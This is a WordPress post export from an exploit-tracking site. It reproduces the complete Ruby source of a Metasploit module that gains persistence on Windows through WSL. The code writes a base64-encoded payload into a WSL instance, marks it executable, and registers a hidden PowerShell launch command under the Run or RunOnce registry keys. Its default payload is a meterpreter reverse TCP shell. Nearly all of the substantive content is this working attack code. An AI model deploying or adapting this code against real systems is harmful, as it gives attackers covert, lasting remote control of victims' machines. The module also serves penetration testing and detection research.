{"id":27011,"date":"2025-11-20T13:36:14","date_gmt":"2025-11-20T13:36:14","guid":{"rendered":"http:\/\/localhost\/?p=27011"},"modified":"2025-11-20T13:36:14","modified_gmt":"2025-11-20T13:36:14","slug":"windows-wsl-via-registry-persistence","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27011","title":{"rendered":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-"},"content":{"rendered":"

{“lastseen”:”2025-11-20T19:04:36″,”description”:”This module will install a payload in WSL and execute it at user logon or system startup via the registry value in \\u0026quot;CurrentVersion\\\\Run\\u0026quot; …”,”published”:”2025-11-20T18:58:57″,”modified”:”2025-11-20T18:58:57″,”type”:”metasploit”,”title”:”Windows WSL via Registry Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = GoodRanking\\n\\n include Msf::Post::Windows::Powershell\\n include Msf::Post::Windows::Registry\\n include Msf::Post::File\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Windows WSL via Registry Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will install a payload in WSL and execute it at user\\n logon or system startup via the registry value in \\”CurrentVersion\\\\Run\\”\\n or \\”RunOnce\\” (depending on privilege and selected method).\\n The payload will be installed completely in registry.\\n\\n Staged payloads, like fetch payloads in linux X64 don’t tend to work. The payload\\n will ask for the stage, then submit the HTTP fetch request\\n and when the payload is sent it doesn’t execute.\\n\\n `cmd\/linux\/http\/x64\/meterpreter_reverse_tcp` and unix cmd payloads tend to work.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Joe Helle’, # original writeup\\n ‘h00die’,\\n ],\\n ‘Platform’ =\\u003e [ ‘unix’, ‘linux’ ],\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_X64],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’, ‘shell’ ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘Payload’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter_reverse_tcp’\\n },\\n ‘Targets’ =\\u003e [\\n [ ‘Automatic’, {} ]\\n ],\\n ‘References’ =\\u003e [\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],\\n [‘URL’, ‘https:\/\/medium.themayor.tech\/windows-persistence-using-wsl2-8f87e319ea56’],\\n [‘URL’, ‘https:\/\/lolapps-project.github.io\/lolapps\/Desktop\/wsl\/’]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2022-01-29’,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [EVENT_DEPENDENT, REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [CONFIG_CHANGES, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptEnum.new(‘STARTUP’,\\n [true, ‘Startup type for the persistent payload.’, ‘USER’, [‘USER’, ‘SYSTEM’]]),\\n OptString.new(‘RUN_NAME’,\\n [false, ‘The name to use for the \\\\’Run\\\\’ key. (Default: random)’ ]),\\n OptEnum.new(‘REG_KEY’, [true, ‘Registry Key To Install To’, ‘Run’, %w[Run RunOnce]]),\\n OptString.new(‘PAYLOAD_NAME’,\\n [false, ‘The filename for the payload to be used on the target host (random by default).’]),\\n ])\\n\\n # overload this to prevent it from trying to do windows things since we’re writing to the underlying linux\\n register_advanced_options(\\n [\\n OptString.new(‘WritableDir’, [true, ‘A directory where we can write files’, ‘\/tmp’]),\\n ]\\n )\\n end\\n\\n def generate_cmd_reg\\n datastore[‘RUN_NAME’] || Rex::Text.rand_text_alphanumeric(8)\\n end\\n\\n def regkey\\n datastore[‘REG_KEY’]\\n end\\n\\n def install_cmd(cmd, cmd_reg, root_path)\\n unless registry_setvaldata(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\”, cmd_reg, cmd, ‘REG_EXPAND_SZ’)\\n fail_with(Failure::Unknown, ‘Could not install run key’)\\n end\\n print_good(\\”Installed run key #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{cmd_reg}\\”)\\n end\\n\\n def get_root_path\\n return ‘HKCU’ if datastore[‘STARTUP’] == ‘USER’\\n\\n ‘HKLM’\\n end\\n\\n def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)\\n @clean_up_rc \\u003c\\u003c \\”reg deleteval -k ‘#{root_path}\\\\\\\\#{blob_reg_key}’ -v ‘#{blob_reg_name}’\\\\n\\”\\n if new_key\\n @clean_up_rc \\u003c\\u003c \\”reg deletekey -k ‘#{root_path}\\\\\\\\#{blob_reg_key}’\\\\n\\”\\n end\\n @clean_up_rc \\u003c\\u003c \\”reg deleteval -k ‘#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}’ -v ‘#{cmd_reg}’\\\\n\\”\\n end\\n\\n def check\\n # \/tmp seems to persist on *some* Ubuntu WSL (wsl v1 it did, v2 it didnt)\\n print_warning(‘Payloads in \/tmp will only last until reboot, you want to choose elsewhere.’) if datastore[‘WritableDir’].start_with?(‘\/tmp’)\\n return Msf::Exploit::CheckCode::Safe(‘System does not have powershell’) unless registry_enumkeys(‘HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\’).include?(‘PowerShell’)\\n\\n vprint_good(‘Powershell detected on system’)\\n\\n # test write to see if we have access\\n root_path = get_root_path\\n rand = Rex::Text.rand_text_alphanumeric(15)\\n\\n vprint_status(\\”Checking registry write access to: #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{rand}\\”)\\n return Msf::Exploit::CheckCode::Safe(\\”Unable to write to registry path #{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\”) if registry_createkey(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\#{rand}\\”).nil?\\n\\n registry_deletekey(\\”#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}\\\\\\\\#{rand}\\”)\\n\\n return Msf::Exploit::CheckCode::Safe(‘WSL Not installed’) unless wsl_enabled?\\n\\n Msf::Exploit::CheckCode::Vulnerable(‘Registry writable and WSL installed’)\\n end\\n\\n def install_persistence\\n root_path = get_root_path\\n print_status(\\”Root path is #{root_path}\\”)\\n table = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘WSL’,\\n ‘Columns’ =\\u003e %w[# Instance_Name State Version Default],\\n ‘Rows’ =\\u003e instance_list.map.with_index do |instance, i|\\n [i + 1, instance[:name], instance[:state], instance[:version], instance[:default]]\\n end\\n )\\n\\n print_line table.to_s\\n payload_name = datastore[‘PAYLOAD_NAME’] || Rex::Text.rand_text_alpha((rand(6..13)))\\n\\n # write our payload into a file\\n vprint_status(\\”Writing payload to: #{datastore[‘WritableDir’]}\/#{payload_name}. WSL may take a little while to start up…\\”)\\n\\n b64_payload = Rex::Text.encode_base64(payload.encoded)\\n\\n bash_command = \\”bash -lc ‘echo #{b64_payload} | base64 -d \\u003e #{datastore[‘WritableDir’]}\/#{payload_name}’\\”\\n ps_command = \\”powershell.exe -WindowStyle Hidden -Command \\\\\\”wsl #{bash_command}\\\\\\”\\”\\n\\n # sometimes wsl is busy doing wsl things and can take a minute to come up for this first command.\\n resp = cmd_exec(ps_command, nil, 120)\\n fail_with(Failure::UnexpectedReply, \\”Writing payload output: #{resp}\\”) unless resp.strip.empty?\\n print_good(‘Payload wrote successfully’)\\n\\n resp = cmd_exec(\\”powershell.exe -WindowStyle Hidden -Command \\\\\\”wsl chmod +x #{datastore[‘WritableDir’]}\/#{payload_name}\\\\\\”\\”)\\n fail_with(Failure::UnexpectedReply, \\”Setting payload permissions output: #{resp}\\”) unless resp.strip.empty?\\n\\n cmd = \\”powershell.exe -WindowStyle Hidden -Command \\\\\\”wsl bash -lc ‘cd #{datastore[‘WritableDir’]}; nohup #{datastore[‘WritableDir’]}\/#{payload_name} \\u003e \/dev\/null 2\\u003e\\u00261’\\\\\\”\\”\\n cmd_reg = generate_cmd_reg\\n\\n print_status(‘Installing run key’)\\n install_cmd(cmd, cmd_reg, root_path)\\n\\n @clean_up_rc \\u003c\\u003c \\”reg deleteval -k ‘#{root_path}\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\#{regkey}’ -v ‘#{cmd_reg}’\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”execute -f cmd.exe -a \\\\\\” \/c wsl rm ‘#{datastore[‘WritableDir’]}\/#{payload_name}’\\\\\\”\\\\n\\”\\n end\\n\\n def wsl_enabled?\\n # Powershell output will look like the following:\\n #\\n # FeatureName : Microsoft-Windows-Subsystem-Linux\\n # DisplayName : Windows Subsystem for Linux\\n # Description : Provides services and environments for running native user-mode Linux shells and tools on Windows.\\n # RestartRequired : Possible\\n # State : Enabled\\n # CustomProperties :\\n # ServerComponent\\\\Description : Provides services and environments for running native user-mode Linux\\n # shells and tools on Windows.\\n # ServerComponent\\\\DisplayName : Windows Subsystem for Linux\\n # ServerComponent\\\\Id : 1033\\n # ServerComponent\\\\Type : Feature\\n # ServerComponent\\\\UniqueName : Microsoft-Windows-Subsystem-Linux\\n # ServerComponent\\\\Deploys\\\\Update\\\\Name : Microsoft-Windows-Subsystem-Linux\\n return false unless have_powershell?\\n\\n cmd = ‘powershell.exe -WindowStyle Hidden -Command \\”Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux\\”‘\\n result = cmd_exec(cmd)\\n\\n return false if result.blank?\\n\\n # Extract the state line, e.g. \\”State : Enabled\\”\\n if result =~ \/^State\\\\s*:\\\\s*(\\\\w+)\/i\\n return Regexp.last_match(1).casecmp(‘Enabled’).zero?\\n end\\n\\n false\\n end\\n\\n def clean_windows_utf16(str)\\n # Detect presence of null bytes (\\\\u0000)\\n if str.include?(\\”\\\\u0000\\”)\\n # Convert from UTF-16LE to UTF-8\\n str.encode(‘UTF-8’, ‘UTF-16LE’)\\n else\\n # Return unchanged if it\u2019s already clean\\n str\\n end\\n end\\n\\n def instance_list\\n vprint_status(‘Enumerating WSL Instances’)\\n cmd = ‘powershell.exe -WindowStyle Hidden -Command \\”wsl –list –verbose\\”‘\\n # 3hrs later of debugging, i found this returns \\” \\\\u0000 \\\\u0000N\\\\u0000A\\\\u0000M\\\\u0000E\\\\u0000 \\\\u0000 \\\\u0000\\”… so clean it up\\n result = clean_windows_utf16(cmd_exec(cmd))\\n\\n return [] if result.nil?\\n return [] unless result =~ \/NAME\\\\s+STATE\\\\s+VERSION\/i\\n\\n lines = result.lines.map(\\u0026:strip).reject(\\u0026:empty?)\\n\\n header_index = lines.find_index { |l| l =~ \/NAME\\\\s+STATE\\\\s+VERSION\/i }\\n return [] if header_index.nil?\\n\\n data_lines = lines[(header_index + 1)..]\\n images = []\\n data_lines.map do |line|\\n # Handle the default distro marked with ‘*’\\n default = line.start_with?(‘*’)\\n line = line.sub(\/^\\\\*\\\\s*\/, ”) # remove leading \\”* \\”\\n\\n # Split by whitespace but preserve multi-word names\\n # Example line: \\”Ubuntu-22.04 Running 2\\”\\n name, state, version = line.split(\/\\\\s{2,}\/)\\n\\n images.append({\\n name: name,\\n state: state,\\n version: version,\\n default: default\\n })\\n end\\n images\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/wsl\/registry.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/wsl\/registry\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-20T19:04:36″,”description”:”This module will install a payload in WSL and execute it at user logon or system startup via the registry value in \\u0026quot;CurrentVersion\\\\Run\\u0026quot; …”,”published”:”2025-11-20T18:58:57″,”modified”:”2025-11-20T18:58:57″,”type”:”metasploit”,”title”:”Windows WSL…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-27011","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nWindows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27011\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-20T19:04:36″,”description”:”This module will install a payload in WSL and execute it at user logon or system startup via the registry value in u0026quot;CurrentVersion\\Runu0026quot; …”,”published”:”2025-11-20T18:58:57″,”modified”:”2025-11-20T18:58:57″,”type”:”metasploit”,”title”:”Windows WSL...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27011\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-20T13:36:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-\",\"datePublished\":\"2025-11-20T13:36:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011\"},\"wordCount\":1668,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27011#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011\",\"name\":\"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-20T13:36:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27011\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27011#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27011","og_locale":"en_US","og_type":"article","og_title":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem","og_description":"{“lastseen”:”2025-11-20T19:04:36″,”description”:”This module will install a payload in WSL and execute it at user logon or system startup via the registry value in u0026quot;CurrentVersion\\Runu0026quot; …”,”published”:”2025-11-20T18:58:57″,”modified”:”2025-11-20T18:58:57″,”type”:”metasploit”,”title”:”Windows WSL...","og_url":"https:\/\/zero.redgem.net\/?p=27011","og_site_name":"zero redgem","article_published_time":"2025-11-20T13:36:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27011#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27011"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-","datePublished":"2025-11-20T13:36:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27011"},"wordCount":1668,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27011#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27011","url":"https:\/\/zero.redgem.net\/?p=27011","name":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-20T13:36:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27011#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27011"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27011#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Windows WSL via Registry Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-WSL-REGISTRY-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27011"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27011\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}